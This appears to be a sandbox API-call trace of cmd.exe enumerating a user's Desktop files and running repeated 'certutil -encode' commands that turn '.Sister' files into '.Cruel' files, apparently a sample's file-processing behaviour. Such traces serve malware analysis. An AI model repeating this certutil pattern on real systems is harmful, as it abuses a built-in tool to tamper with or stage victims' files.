_MaxCount=0x7) returned 2 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.702] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.702] GetProcessHeap () returned 0x21ed8c70000 [0214.702] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0214.702] GetProcessHeap () returned 0x21ed8c70000 [0214.702] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95940 [0214.702] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.702] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0214.703] _get_osfhandle (_FileHandle=0) returned 0x4c [0214.703] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0214.703] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1070, dwThreadId=0x1068)) returned 1 [0214.713] CloseHandle (hObject=0xa4) returned 1 [0214.713] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.713] GetProcessHeap () returned 0x21ed8c70000 [0214.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0214.713] GetEnvironmentStringsW () returned 0x21ed93b0130* [0214.713] GetProcessHeap () returned 0x21ed8c70000 [0214.713] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0214.713] FreeEnvironmentStringsA (penv="=") returned 1 [0214.713] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0215.051] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0215.051] CloseHandle (hObject=0xa8) returned 1 [0215.051] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0215.051] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0215.051] GetProcessHeap () returned 0x21ed8c70000 [0215.052] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0215.052] GetEnvironmentStringsW () returned 0x21ed93b0130* [0215.052] GetProcessHeap () returned 0x21ed8c70000 [0215.052] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0215.052] FreeEnvironmentStringsA (penv="=") returned 1 [0215.052] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.052] GetProcessHeap () returned 0x21ed8c70000 [0215.052] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0215.052] GetEnvironmentStringsW () returned 0x21ed93b0130* [0215.052] GetProcessHeap () returned 0x21ed8c70000 [0215.052] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0215.052] FreeEnvironmentStringsA (penv="=") returned 1 [0215.052] GetProcessHeap () returned 0x21ed8c70000 [0215.052] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95940) returned 1 [0215.053] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0215.053] ??_V@YAXPEAX@Z () returned 0x1 [0215.053] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ca0b80, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xb5f66820, ftLastAccessTime.dwHighDateTime=0x1d5e914, ftLastWriteTime.dwLowDateTime=0xb5f66820, ftLastWriteTime.dwHighDateTime=0x1d5e914, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="3Pvsa95E4Bhj9.jpg.Sister", cAlternateFileName="")) returned 1 [0215.053] GetProcessHeap () returned 0x21ed8c70000 [0215.053] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95de0, Size=0x15c) returned 0x21ed8d639c0 [0215.053] GetProcessHeap () returned 0x21ed8c70000 [0215.053] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d639c0) returned 0x15c [0215.053] GetProcessHeap () returned 0x21ed8c70000 [0215.053] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a540 [0215.053] GetProcessHeap () returned 0x21ed8c70000 [0215.053] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a540, Size=0x58) returned 0x21ed937a540 [0215.053] GetProcessHeap () returned 0x21ed8c70000 [0215.053] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a540) returned 0x58 [0215.053] GetProcessHeap () returned 0x21ed8c70000 [0215.053] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a5b0 [0215.053] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0215.053] GetProcessHeap () returned 0x21ed8c70000 [0215.053] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bf30 [0215.053] ??_V@YAXPEAX@Z () returned 0x1 [0215.053] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0215.054] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce20 [0215.054] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0215.054] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0215.054] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0215.054] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xaac0ba41, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xaac0ba41, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7d000 [0215.054] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0215.055] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ca0b80, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xb5f66820, ftLastAccessTime.dwHighDateTime=0x1d5e914, ftLastWriteTime.dwLowDateTime=0xb5f66820, ftLastWriteTime.dwHighDateTime=0x1d5e914, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="3Pvsa95E4Bhj9.jpg.Sister", cAlternateFileName="3PVSA9~1.SIS")) returned 0x21ed8c7cf40 [0215.055] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0215.055] _wcsnicmp (_String1="3PVSA9~1.SIS", _String2="3Pvsa95E4Bhj9.jpg.Sister", _MaxCount=0x18) returned 73 [0215.055] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0215.055] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0215.055] GetProcessHeap () returned 0x21ed8c70000 [0215.055] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc87d0 [0215.055] ??_V@YAXPEAX@Z () returned 0x1 [0215.055] ??_V@YAXPEAX@Z () returned 0x1 [0215.055] GetProcessHeap () returned 0x21ed8c70000 [0215.055] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a5b0, Size=0x200) returned 0x21ed937a5b0 [0215.055] GetProcessHeap () returned 0x21ed8c70000 [0215.055] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a5b0) returned 0x200 [0215.055] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0215.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.055] GetFileType (hFile=0x50) returned 0x2 [0215.056] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.056] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0215.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.056] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0215.064] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0215.064] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0215.064] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0215.064] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0215.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.064] GetFileType (hFile=0x50) returned 0x2 [0215.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.064] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0215.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.065] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0215.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.065] GetFileType (hFile=0x50) returned 0x2 [0215.065] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.065] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0215.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.066] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937a550*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937a550*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0215.066] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\" ") returned 62 [0215.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.066] GetFileType (hFile=0x50) returned 0x2 [0215.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.066] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0215.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.067] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3e) returned 1 [0215.068] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0215.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.068] GetFileType (hFile=0x50) returned 0x2 [0215.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.068] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0215.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.068] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0215.072] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0215.072] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0215.072] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0215.072] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0215.072] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0215.072] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0215.072] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0215.072] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0215.072] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0215.072] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0215.072] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0215.072] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0215.072] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0215.072] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0215.072] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0215.072] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0215.072] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0215.072] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0215.072] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0215.073] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0215.073] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0215.073] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0215.073] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0215.073] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0215.073] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0215.073] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0215.073] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0215.073] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0215.073] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0215.073] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0215.073] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0215.073] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0215.073] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0215.073] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0215.073] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0215.073] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0215.073] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0215.073] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0215.073] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0215.073] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0215.073] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0215.073] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0215.073] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0215.073] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0215.073] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0215.073] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0215.073] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0215.073] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0215.073] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0215.073] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0215.073] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0215.073] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0215.073] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0215.074] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0215.074] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0215.074] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0215.074] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0215.074] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0215.074] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0215.074] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0215.074] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0215.074] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0215.074] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0215.074] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0215.074] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0215.074] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0215.074] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0215.074] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0215.074] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0215.074] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0215.074] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0215.074] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0215.074] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0215.074] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0215.074] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0215.074] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0215.074] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0215.074] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0215.074] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0215.074] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0215.074] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0215.074] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0215.074] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0215.074] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0215.074] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0215.074] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0215.075] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0215.075] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0215.075] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0215.075] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0215.075] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0215.075] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0215.075] ??_V@YAXPEAX@Z () returned 0x1 [0215.075] GetProcessHeap () returned 0x21ed8c70000 [0215.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8c97020 [0215.075] GetProcessHeap () returned 0x21ed8c70000 [0215.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x9e) returned 0x21ed8c7d2a0 [0215.075] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0215.075] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0215.075] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0215.075] GetProcessHeap () returned 0x21ed8c70000 [0215.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8ca7010 [0215.078] SetErrorMode (uMode=0x0) returned 0x0 [0215.078] SetErrorMode (uMode=0x1) returned 0x0 [0215.078] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8ca7020, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0215.078] SetErrorMode (uMode=0x0) returned 0x1 [0215.078] GetProcessHeap () returned 0x21ed8c70000 [0215.078] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ca7010, Size=0x52) returned 0x21ed8ca7010 [0215.078] GetProcessHeap () returned 0x21ed8c70000 [0215.078] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ca7010) returned 0x52 [0215.078] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0215.078] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.078] GetProcessHeap () returned 0x21ed8c70000 [0215.078] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d644c0 [0215.078] GetProcessHeap () returned 0x21ed8c70000 [0215.078] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed9980bd0 [0215.078] GetProcessHeap () returned 0x21ed8c70000 [0215.078] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980bd0, Size=0x1be) returned 0x21ed9980bd0 [0215.078] GetProcessHeap () returned 0x21ed8c70000 [0215.078] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980bd0) returned 0x1be [0215.078] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.078] GetProcessHeap () returned 0x21ed8c70000 [0215.078] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d63b30 [0215.079] GetProcessHeap () returned 0x21ed8c70000 [0215.079] 